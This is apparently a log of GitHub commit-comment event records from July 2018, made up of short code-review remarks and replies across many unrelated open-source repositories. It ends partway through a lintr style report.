{"id":"7983651254","type":"CommitCommentEvent","actor":{"login":"DOgnshiFc"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29751362,"position":null,"line":null,"path":null,"commit_id":"8ed6f4f02965f2e555303811ad28d14b047f52d4","created_at":"2018-07-18T15:15:32Z","updated_at":"2018-07-18T15:15:32Z","author_association":"NONE","body":"hello，What are the values for other display resolutions?For example  2k\r\nemmmmmmmmmmm\r\nI am looking forward to your reply.I hope you understand。"}},"created_at":"2018-07-18T15:15:32Z"}
{"id":"7983651359","type":"CommitCommentEvent","actor":{"login":"fdaciuk"},"repo":{"name":"AnnaGuilger/curso-javascript-ninja"},"payload":{"comment":{"id":29751364,"position":38,"line":38,"path":"challenge-01/README.md","commit_id":"d2134407a36be35be83cde67758afebef555ad0e","created_at":"2018-07-18T15:15:33Z","updated_at":"2018-07-18T15:15:33Z","author_association":"NONE","body":"Oi @AnnaGuilger! Só lembre-se que nomes de variáveis e funções não podem conter caracteres especiais (como `ã`) =)"}},"created_at":"2018-07-18T15:15:33Z"}
{"id":"7983651784","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29751365,"position":20,"line":39,"path":"test/tests.js","commit_id":"a03dfd3ead3dc913fb6eb3e537116f244c5dd8bb","created_at":"2018-07-18T15:15:37Z","updated_at":"2018-07-18T15:15:37Z","author_association":"OWNER","body":"Given I've got some problems I'll try and use your gist. It's probably nothing to do with it but I really can't see what the complaint is about the payload :-("}},"created_at":"2018-07-18T15:15:37Z"}
{"id":"7983652141","type":"CommitCommentEvent","actor":{"login":"smartavionics"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":29751366,"position":null,"line":null,"path":null,"commit_id":"f431cf02a057e6ddfdfb3d2347a2c3e7d71ac9e6","created_at":"2018-07-18T15:15:40Z","updated_at":"2018-07-18T15:15:40Z","author_association":"CONTRIBUTOR","body":"Hi @diegopradogesto , your change in FffGcodeWriter.cpp makes the same mistake as I did a while back. It will create SliceLayerPart objects as it iterates which is slow. You need to change the type of the loop variable to 'const SliceLayerPart&'.\r\n\r\n-    for(unsigned int partNr=0; partNr<layer->parts.size(); partNr++)\r\n+    for (SliceLayerPart part : layer->parts)\r\n     {\r\n-        polygons.add(layer->parts[partNr].outline);\r\n+        polygons.add(part.outline);\r\n     }\r\n "}},"created_at":"2018-07-18T15:15:40Z"}
{"id":"7983654996","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751373,"position":304,"line":304,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:16:06Z","updated_at":"2018-07-18T15:16:06Z","author_association":"OWNER","body":"The function return type is void.\r\n\r\nunloads and frees are expected to not fail."}},"created_at":"2018-07-18T15:16:06Z"}
{"id":"7983655143","type":"CommitCommentEvent","actor":{"login":"SurajGupta"},"repo":{"name":"spritely/ReadModel.Mongo"},"payload":{"comment":{"id":29751375,"position":null,"line":null,"path":null,"commit_id":"fd15a32cac524e08c0041e08faa33a1488545c9e","created_at":"2018-07-18T15:16:07Z","updated_at":"2018-07-18T15:16:07Z","author_association":"CONTRIBUTOR","body":"actually, the reason I rev'ed the 3rd digit, and only on ReadModel.Mongo,\nwas that there were no breaking changes.  It was just additional features.\nNothing about how the framework worked prior to the changes has changed.\nDo you still feel the second digit should be rev'ed?  I didn't rev\nReadModel because there were no changes there at all.\n\nOn Wed, Jul 18, 2018 at 11:14 AM Suraj Gupta <surajg@gmail.com> wrote:\n\n> will do!\n>\n> On Wed, Jul 18, 2018 at 11:12 AM Victor <notifications@github.com> wrote:\n>\n>> These changes are bigger than a simple bug fix, suggest you increment the\n>> second digit, that is to version 0.7.0.\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/spritely/ReadModel.Mongo/commit/fd15a32cac524e08c0041e08faa33a1488545c9e#commitcomment-29751316>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/ABdWoM4csNIxlhlZiw7AZQX1bCkAiCxlks5uH1BfgaJpZM4VUyjX>\n>> .\n>>\n>\n>\n> --\n> Best Regards,\n> Suraj\n> http://obeautifulcode.com/\n>\n\n\n-- \nBest Regards,\nSuraj\nhttp://obeautifulcode.com/\n"}},"created_at":"2018-07-18T15:16:07Z"}
{"id":"7983658862","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751384,"position":339,"line":339,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:16:39Z","updated_at":"2018-07-18T15:16:39Z","author_association":"OWNER","body":"Ok, will do."}},"created_at":"2018-07-18T15:16:39Z"}
{"id":"7983665716","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751394,"position":337,"line":337,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:17:40Z","updated_at":"2018-07-18T15:17:40Z","author_association":"OWNER","body":"This went through several changes. I probably forgot to change this during one of them. I'll fix it."}},"created_at":"2018-07-18T15:17:40Z"}
{"id":"7983666592","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"PIH/openmrs-pwa-workflow"},"payload":{"comment":{"id":29751397,"position":15,"line":54,"path":"src/store.js","commit_id":"ea08569781eb0a70295bb5e66e1cf959719ed0a3","created_at":"2018-07-18T15:17:48Z","updated_at":"2018-07-18T15:17:48Z","author_association":"MEMBER","body":"@cioan we should probably have a little design scrum in the next week or so on how we want to organize all these so they don't become too confusing... hopefully it should be relatively intuitive what the each is... perhaps \"expectedCheckIn\" should be \"expectedCheckInsList\" to make it's clear it's a list. \r\n\r\nAnd perhaps we want to change \"selected\" to \"selectedPatient\" to make it clear it's a patient?  And ideally, the patientVisit would be nested under that... we could either change the way we fetch the patient so that is fetches the active visit, or maybe do something like:\r\n\r\n```\r\nselected: combineReducers({\r\n    patient: patientSelectedReducer,\r\n    visit: visitReducer\r\n})\r\n```\r\n\r\nThoughts?  We should never really have a case where the \"patientVisit\" is the active visit for a patient other than the \"selected\" patient, correct?\r\n\r\n"}},"created_at":"2018-07-18T15:17:48Z"}
{"id":"7983668570","type":"CommitCommentEvent","actor":{"login":"asmolin"},"repo":{"name":"yuzi-co/Forager"},"payload":{"comment":{"id":29751403,"position":null,"line":null,"path":null,"commit_id":"5e5abf841ba0bc2881ac273086775a80dc985f7b","created_at":"2018-07-18T15:18:07Z","updated_at":"2018-07-18T15:18:07Z","author_association":"NONE","body":"Исправь, пожалуйста, \r\n\"Path\": \"CryptoDredge.exe\",\r\nна\r\n\"Path\": \"CryptoDredge_0.7.0\\\\CryptoDredge.exe\","}},"created_at":"2018-07-18T15:18:07Z"}
{"id":"7983672977","type":"CommitCommentEvent","actor":{"login":"OBrezhniev"},"repo":{"name":"idimon4uk/python-trezor"},"payload":{"comment":{"id":29751408,"position":16,"line":591,"path":"trezorctl","commit_id":"9fe50108b7b97657b01ceebad9380d2d09384a22","created_at":"2018-07-18T15:18:48Z","updated_at":"2018-07-18T15:18:48Z","author_association":"NONE","body":"This should be appended only for bip115 coins, right?"}},"created_at":"2018-07-18T15:18:48Z"}
{"id":"7983677111","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29751413,"position":null,"line":null,"path":null,"commit_id":"27b73fc7fca6701091cabfdfea6a227245fc71a2","created_at":"2018-07-18T15:19:26Z","updated_at":"2018-07-18T15:19:26Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-416](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-416).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-416-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-18T15:19:26Z"}
{"id":"7983677338","type":"CommitCommentEvent","actor":{"login":"bbarenblat"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29751414,"position":null,"line":null,"path":null,"commit_id":"f341e0d376cdb517a2fb6c68d835657c89e46b9a","created_at":"2018-07-18T15:19:28Z","updated_at":"2018-07-18T15:19:28Z","author_association":"CONTRIBUTOR","body":"The commit message should begin “This reverts commit f24958a11e3a54f563429aadc12bce033be047fa….”"}},"created_at":"2018-07-18T15:19:28Z"}
{"id":"7983678507","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751417,"position":209,"line":209,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:19:39Z","updated_at":"2018-07-18T15:19:39Z","author_association":"OWNER","body":"Ah, the sed syntax.\r\n\r\nI'll fix it."}},"created_at":"2018-07-18T15:19:39Z"}
{"id":"7983680956","type":"CommitCommentEvent","actor":{"login":"hbenl"},"repo":{"name":"hbenl/vscode-jasmine-test-adapter"},"payload":{"comment":{"id":29751425,"position":15,"line":14,"path":"src/worker/loadTests.ts","commit_id":"6296cabbb3a7eedf8a113c90e088dfdfabdcc9fb","created_at":"2018-07-18T15:20:03Z","updated_at":"2018-07-18T15:20:03Z","author_association":"OWNER","body":"> the order was very important here\r\n\r\nDo you mean that `addReporter` should be called _after_ `execute`?"}},"created_at":"2018-07-18T15:20:03Z"}
{"id":"7983681135","type":"CommitCommentEvent","actor":{"login":"cioan"},"repo":{"name":"PIH/openmrs-pwa-workflow"},"payload":{"comment":{"id":29751427,"position":15,"line":54,"path":"src/store.js","commit_id":"ea08569781eb0a70295bb5e66e1cf959719ed0a3","created_at":"2018-07-18T15:20:04Z","updated_at":"2018-07-18T15:20:04Z","author_association":"MEMBER","body":"Makes sense @mogoodrich . I will refactor this code. Yesterday, I was just trying to get things working. Thanks for reviewing this code."}},"created_at":"2018-07-18T15:20:04Z"}
{"id":"7983682471","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751428,"position":344,"line":344,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:20:16Z","updated_at":"2018-07-18T15:20:16Z","author_association":"OWNER","body":"Ok. I'll fix both."}},"created_at":"2018-07-18T15:20:16Z"}
{"id":"7983683246","type":"CommitCommentEvent","actor":{"login":"snicoll"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":29751430,"position":null,"line":null,"path":null,"commit_id":"9bd723ddada4f8f730c1b41b7fdf4a0a29da15e8","created_at":"2018-07-18T15:20:22Z","updated_at":"2018-07-18T15:20:22Z","author_association":"MEMBER","body":"We did and that proposal is the one you mentioned on the call. I don't feel strongly about it but I prefer `No ApplicationContext found on ServerWebExchange` than the current state."}},"created_at":"2018-07-18T15:20:22Z"}
{"id":"7983684751","type":"CommitCommentEvent","actor":{"login":"DavidBetteridge"},"repo":{"name":"yorkdayofcode/yorkdayofcode.github.io"},"payload":{"comment":{"id":29751436,"position":4,"line":10,"path":"package.json","commit_id":"1f8c8c1a7efd8ef571031887c1657ec36390ca3b","created_at":"2018-07-18T15:20:36Z","updated_at":"2018-07-18T15:20:36Z","author_association":"CONTRIBUTOR","body":"What's a few extra dependencies when you already have 1040\r\n"}},"created_at":"2018-07-18T15:20:36Z"}
{"id":"7983685183","type":"CommitCommentEvent","actor":{"login":"luisreiskeys"},"repo":{"name":"rohitshampur/react-native-background-timer"},"payload":{"comment":{"id":29751437,"position":null,"line":null,"path":null,"commit_id":"a1a94f68e9865b22247edbf43171dabc530c6ea7","created_at":"2018-07-18T15:20:40Z","updated_at":"2018-07-18T15:20:40Z","author_association":"NONE","body":"I have this error when use this version:\r\nerror: cannot find symbol\r\n    private final LifecycleEventListener listener = new LifecycleEventListener(){\r\n                                                        ^\r\n  symbol:   class LifecycleEventListener\r\n  location: class BackgroundTimerModule\r\n\r\nerror: cannot find symbol\r\n        this.powerManager = (PowerManager) getReactApplicationContext().getSystemService(POWER_SERVICE);\r\n                                                                                         ^\r\n  symbol:   variable POWER_SERVICE\r\n  location: class BackgroundTimerModule\r\n\r\n"}},"created_at":"2018-07-18T15:20:40Z"}
{"id":"7983690732","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29751447,"position":null,"line":null,"path":null,"commit_id":"27b73fc7fca6701091cabfdfea6a227245fc71a2","created_at":"2018-07-18T15:21:31Z","updated_at":"2018-07-18T15:21:31Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-417](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-417).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-417-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-18T15:21:31Z"}
{"id":"7983690794","type":"CommitCommentEvent","actor":{"login":"flovilmart"},"repo":{"name":"hbenl/vscode-jasmine-test-adapter"},"payload":{"comment":{"id":29751448,"position":15,"line":14,"path":"src/worker/loadTests.ts","commit_id":"6296cabbb3a7eedf8a113c90e088dfdfabdcc9fb","created_at":"2018-07-18T15:21:32Z","updated_at":"2018-07-18T15:21:32Z","author_association":"CONTRIBUTOR","body":"Yep, in case helper files redefine the reporters, the ones defined by the extensions are cleared. I thought I had put a comment in there for the ordering, my bad that I forgot"}},"created_at":"2018-07-18T15:21:32Z"}
{"id":"7983694726","type":"CommitCommentEvent","actor":{"login":"paliarush"},"repo":{"name":"comwrap/bulk-api-ce"},"payload":{"comment":{"id":29751455,"position":3,"line":3,"path":"app/code/Magento/WebapiAsync/etc/communication.xml","commit_id":"98396d629da2fff6fcde6755b2a42f329dfc391c","created_at":"2018-07-18T15:22:06Z","updated_at":"2018-07-18T15:22:06Z","author_association":"NONE","body":"This change looks good. In addition:\r\n- We need to add this attribute to the XSD (I cannot see it added yet)\r\n- Verify that remote service interface functionality still works as expected. See related test here https://github.com/magento/magento2/blob/06da25a9042fc7ef7122d13c268cd62ba5ce5745/dev/tests/integration/_files/Magento/TestModuleSynchronousAmqp/etc/di.xml#L9"}},"created_at":"2018-07-18T15:22:06Z"}
{"id":"7983699780","type":"CommitCommentEvent","actor":{"login":"OBrezhniev"},"repo":{"name":"idimon4uk/python-trezor"},"payload":{"comment":{"id":29751464,"position":32,"line":619,"path":"trezorctl","commit_id":"9fe50108b7b97657b01ceebad9380d2d09384a22","created_at":"2018-07-18T15:22:52Z","updated_at":"2018-07-18T15:22:52Z","author_association":"NONE","body":"Same question here."}},"created_at":"2018-07-18T15:22:52Z"}
{"id":"7983700068","type":"CommitCommentEvent","actor":{"login":"Ahmedrissa909"},"repo":{"name":"tranleduy2000/javaide"},"payload":{"comment":{"id":29751465,"position":28,"line":28,"path":"aosp/builder-model/src/main/java/com/android/builder/model/AndroidArtifactOutput.java","commit_id":"8b065a91b79c41aac9733ca89d9e54407cf065d3","created_at":"2018-07-18T15:22:54Z","updated_at":"2018-07-18T15:22:54Z","author_association":"NONE","body":"VariantOutput is missing"}},"created_at":"2018-07-18T15:22:54Z"}
{"id":"7983702532","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29751469,"position":10,"line":502,"path":"tests/AlgorithmTest.php","commit_id":"14030163625613a8b4c68280ec2fb9bd286bded7","created_at":"2018-07-18T15:23:16Z","updated_at":"2018-07-18T15:23:16Z","author_association":"CONTRIBUTOR","body":"I think it should have another test with the following test case.\r\nConsider the following snippet code:\r\n\r\n```php\r\n$deep = A\\mapDeep(function ($val) { return $val * 2; }, [1, 2, [3, new \\stdClass()], [5, [6, 7]]]);\r\n```\r\n\r\nI think it will throw the `fatal error` message, and you need to consider that."}},"created_at":"2018-07-18T15:23:16Z"}
{"id":"7983704908","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"blockcypher/explorer"},"payload":{"comment":{"id":29751474,"position":null,"line":null,"path":null,"commit_id":"36989792b933d7295945c2961dffc4e6649f98d4","created_at":"2018-07-18T15:23:39Z","updated_at":"2018-07-18T15:23:39Z","author_association":"NONE","body":"3698979"}},"created_at":"2018-07-18T15:23:39Z"}
{"id":"7983740709","type":"CommitCommentEvent","actor":{"login":"lukeskinner"},"repo":{"name":"OriginTrail/ot-node"},"payload":{"comment":{"id":29751534,"position":74,"line":851,"path":"modules/EventEmitter.js","commit_id":"adc4945ba3c06f18916afa70411e7536d5ae2f98","created_at":"2018-07-18T15:29:13Z","updated_at":"2018-07-18T15:29:13Z","author_association":"NONE","body":"Ecrypted should be Encrypted... not that this matters too much! "}},"created_at":"2018-07-18T15:29:13Z"}
{"id":"7983741626","type":"CommitCommentEvent","actor":{"login":"mcd500"},"repo":{"name":"columbia-irt/rtptools"},"payload":{"comment":{"id":29751535,"position":null,"line":null,"path":null,"commit_id":"b362334560dc1020fddd44587f7a9be189da7d8a","created_at":"2018-07-18T15:29:22Z","updated_at":"2018-07-18T15:29:22Z","author_association":"CONTRIBUTOR","body":"Sorry but I do not see any place in my patch adding a new `start` variable in `main()` of rtpdump.c.\r\nThe fix is for rtpdump.c.\r\nCould you elaborate it?\r\nI have to sleep from now. It passed midnight.\r\n"}},"created_at":"2018-07-18T15:29:22Z"}
{"id":"7983742612","type":"CommitCommentEvent","actor":{"login":"LuisRAnrrango"},"repo":{"name":"LuisRAnrrango/Sprint2-Software-II"},"payload":{"comment":{"id":29751538,"position":null,"line":null,"path":null,"commit_id":"efe3ecd00553e04ad5ebf8dc5c41280fb397e1aa","created_at":"2018-07-18T15:29:32Z","updated_at":"2018-07-18T15:29:32Z","author_association":"OWNER","body":"Estas bien"}},"created_at":"2018-07-18T15:29:32Z"}
{"id":"7983744530","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29751542,"position":60,"line":155,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/QualifiedExpressionResolver.kt","commit_id":"acede8b1efb020bae97d3fd1895f5689d104fa10","created_at":"2018-07-18T15:29:50Z","updated_at":"2018-07-18T15:29:50Z","author_association":"MEMBER","body":"Sorry, but it's really controversial :)"}},"created_at":"2018-07-18T15:29:50Z"}
{"id":"7983746385","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751546,"position":484,"line":484,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:30:07Z","updated_at":"2018-07-18T15:30:07Z","author_association":"OWNER","body":"Yes. It looks worse because of GitHub's 8 tab width. Should I use just one?"}},"created_at":"2018-07-18T15:30:07Z"}
{"id":"7983749987","type":"CommitCommentEvent","actor":{"login":"ryanfox"},"repo":{"name":"BitMEX/sample-market-maker"},"payload":{"comment":{"id":29751553,"position":17,"line":49,"path":"test/websocket-apikey-auth-test.py","commit_id":"12ea6a005508176798cbfc957297b3cc94c06567","created_at":"2018-07-18T15:30:39Z","updated_at":"2018-07-18T15:30:39Z","author_association":"NONE","body":"You're right. It _was_ working, because `time.time()` works as a nonce, but that's not correct.\r\n\r\nShould be fixed now."}},"created_at":"2018-07-18T15:30:39Z"}
{"id":"7983751103","type":"CommitCommentEvent","actor":{"login":"hbenl"},"repo":{"name":"hbenl/vscode-jasmine-test-adapter"},"payload":{"comment":{"id":29751556,"position":15,"line":14,"path":"src/worker/loadTests.ts","commit_id":"6296cabbb3a7eedf8a113c90e088dfdfabdcc9fb","created_at":"2018-07-18T15:30:49Z","updated_at":"2018-07-18T15:30:49Z","author_association":"OWNER","body":"OK, thanks, I'll revert the ordering (and add a comment)."}},"created_at":"2018-07-18T15:30:49Z"}
{"id":"7983752626","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751562,"position":610,"line":610,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:31:04Z","updated_at":"2018-07-18T15:31:04Z","author_association":"OWNER","body":"Ok, I'll fix this one and the one before.\r\n\r\nThat said, wouldn't the compiler optimize them anyway?"}},"created_at":"2018-07-18T15:31:04Z"}
{"id":"7983757134","type":"CommitCommentEvent","actor":{"login":"OBrezhniev"},"repo":{"name":"idimon4uk/python-trezor"},"payload":{"comment":{"id":29751571,"position":31,"line":86,"path":"trezorlib/tx_api.py","commit_id":"9fe50108b7b97657b01ceebad9380d2d09384a22","created_at":"2018-07-18T15:31:46Z","updated_at":"2018-07-18T15:31:46Z","author_association":"NONE","body":"Better, but looks like it still doesn't fix the problem outlined by matejcik."}},"created_at":"2018-07-18T15:31:46Z"}
{"id":"7983759222","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29751573,"position":20,"line":39,"path":"test/tests.js","commit_id":"a03dfd3ead3dc913fb6eb3e537116f244c5dd8bb","created_at":"2018-07-18T15:32:05Z","updated_at":"2018-07-18T15:32:05Z","author_association":"OWNER","body":"This block was what was calling the payload problem. I switched out `return Promise.all(orderedPromises)})` for `return sequentialPromise(orderedPromises);` and I got further along. I really owe you one with this tip!!"}},"created_at":"2018-07-18T15:32:05Z"}
{"id":"7983761054","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29751578,"position":234,"line":400,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/QualifiedExpressionResolver.kt","commit_id":"acede8b1efb020bae97d3fd1895f5689d104fa10","created_at":"2018-07-18T15:32:22Z","updated_at":"2018-07-18T15:32:22Z","author_association":"MEMBER","body":"Probably `name` shouldn't be ope"}},"created_at":"2018-07-18T15:32:22Z"}
{"id":"7983762193","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751581,"position":731,"line":731,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:32:33Z","updated_at":"2018-07-18T15:32:33Z","author_association":"OWNER","body":"It is used in a number of places. In case it ever has to be changed, only one update has to be made."}},"created_at":"2018-07-18T15:32:33Z"}
{"id":"7983763171","type":"CommitCommentEvent","actor":{"login":"benjamn"},"repo":{"name":"apollographql/apollo-client"},"payload":{"comment":{"id":29751583,"position":null,"line":null,"path":null,"commit_id":"a07b33d53759c8771444ac9c6853a31e4bdd2408","created_at":"2018-07-18T15:32:42Z","updated_at":"2018-07-18T15:32:42Z","author_association":"CONTRIBUTOR","body":"Reasonable theory, but in this case I don't think so:\r\n```sh\r\n~/dev/apollo-client/packages/apollo-cache-inmemory/lib% realpath $PWD  \r\n/Users/ben/dev/apollo-client/packages/apollo-cache-inmemory/lib\r\n~/dev/apollo-client/packages/apollo-cache-inmemory/lib% realpath --no-symlinks $PWD\r\n/Users/ben/dev/apollo-client/packages/apollo-cache-inmemory/lib\r\n```"}},"created_at":"2018-07-18T15:32:42Z"}
{"id":"7983764514","type":"CommitCommentEvent","actor":{"login":"mithro"},"repo":{"name":"cr1901/symbiflow-arch-defs"},"payload":{"comment":{"id":29751588,"position":33,"line":33,"path":"xc20xx/primitives/lut/xc20xx_lut.sim.v","commit_id":"5221981cd9f9f78de03e462b9eb4e6498019f372","created_at":"2018-07-18T15:32:55Z","updated_at":"2018-07-18T15:32:55Z","author_association":"NONE","body":"A \"routing mux\" is a mux that is configured by the bitstream rather than by a user controlled signal."}},"created_at":"2018-07-18T15:32:55Z"}
{"id":"7983770097","type":"CommitCommentEvent","actor":{"login":"yousseb23"},"repo":{"name":"yousseb23/hello-world"},"payload":{"comment":{"id":29751597,"position":2,"line":2,"path":"README.md","commit_id":"f229456e8ad2db16f4e3a5964d9782601594d511","created_at":"2018-07-18T15:33:48Z","updated_at":"2018-07-18T15:33:48Z","author_association":"OWNER","body":"yoyoyo\r\n"}},"created_at":"2018-07-18T15:33:48Z"}
{"id":"7983771670","type":"CommitCommentEvent","actor":{"login":"yousseb23"},"repo":{"name":"yousseb23/hello-world"},"payload":{"comment":{"id":29751603,"position":null,"line":null,"path":null,"commit_id":"f229456e8ad2db16f4e3a5964d9782601594d511","created_at":"2018-07-18T15:34:04Z","updated_at":"2018-07-18T15:34:04Z","author_association":"OWNER","body":"oh no"}},"created_at":"2018-07-18T15:34:04Z"}
{"id":"7983772855","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Elavrenov/Training.-Summer-2018"},"payload":{"comment":{"id":29751606,"position":98,"line":56,"path":"NET.S.2018.Lavrenov.09/JaggedArraySorts/JaggedArrayBubbleSort.cs","commit_id":"6eff094558c27291760f2f13119906509f01c6e8","created_at":"2018-07-18T15:34:14Z","updated_at":"2018-07-18T15:34:14Z","author_association":"NONE","body":"если раздел private, то он автоматически не может быть api)"}},"created_at":"2018-07-18T15:34:14Z"}
{"id":"7983778416","type":"CommitCommentEvent","actor":{"login":"OBrezhniev"},"repo":{"name":"idimon4uk/python-trezor"},"payload":{"comment":{"id":29751615,"position":39,"line":114,"path":"trezorlib/tx_api.py","commit_id":"9fe50108b7b97657b01ceebad9380d2d09384a22","created_at":"2018-07-18T15:35:07Z","updated_at":"2018-07-18T15:35:07Z","author_association":"NONE","body":"Can you just check for `o.script_pubkey[-1] == 0xb4`?"}},"created_at":"2018-07-18T15:35:07Z"}
{"id":"7983780856","type":"CommitCommentEvent","actor":{"login":"yuzi-co"},"repo":{"name":"yuzi-co/Forager"},"payload":{"comment":{"id":29751620,"position":null,"line":null,"path":null,"commit_id":"5e5abf841ba0bc2881ac273086775a80dc985f7b","created_at":"2018-07-18T15:35:28Z","updated_at":"2018-07-18T15:35:28Z","author_association":"OWNER","body":"пофиксил, спасибо )"}},"created_at":"2018-07-18T15:35:28Z"}
{"id":"7983784776","type":"CommitCommentEvent","actor":{"login":"lenagithub4"},"repo":{"name":"lenagithub4/Selenium_WEBDRIVER_test"},"payload":{"comment":{"id":29751630,"position":3,"line":3,"path":"README.md","commit_id":"5a5883ab4906ebe0740e5b849660352a3470d596","created_at":"2018-07-18T15:36:05Z","updated_at":"2018-07-18T15:36:05Z","author_association":"OWNER","body":"hocu ego udalitj"}},"created_at":"2018-07-18T15:36:05Z"}
{"id":"7983785130","type":"CommitCommentEvent","actor":{"login":"jlaasonen"},"repo":{"name":"ElectronicBabylonianLiterature/ebl-frontend"},"payload":{"comment":{"id":29751632,"position":null,"line":null,"path":null,"commit_id":"ddf78c3bb1c19341aa0aa959990f86efb289f473","created_at":"2018-07-18T15:36:08Z","updated_at":"2018-07-18T15:36:08Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Editing the second item in list makes third disappear](https://trello.com/c/hN0BuAVM/50-editing-the-second-item-in-list-makes-third-disappear)"}},"created_at":"2018-07-18T15:36:08Z"}
{"id":"7983788545","type":"CommitCommentEvent","actor":{"login":"sunliangliang9201"},"repo":{"name":"sunliangliang9201/python_learn"},"payload":{"comment":{"id":29751644,"position":null,"line":null,"path":null,"commit_id":"5155e0f75cea355a608e1448f9dc6ae603ffd67e","created_at":"2018-07-18T15:36:40Z","updated_at":"2018-07-18T15:36:40Z","author_association":"OWNER","body":"2018-07-18"}},"created_at":"2018-07-18T15:36:40Z"}
{"id":"7983790010","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29751648,"position":null,"line":null,"path":null,"commit_id":"fe0c4c1981c4527bfefa4e5701f8dad30bc593ad","created_at":"2018-07-18T15:36:53Z","updated_at":"2018-07-18T15:36:53Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    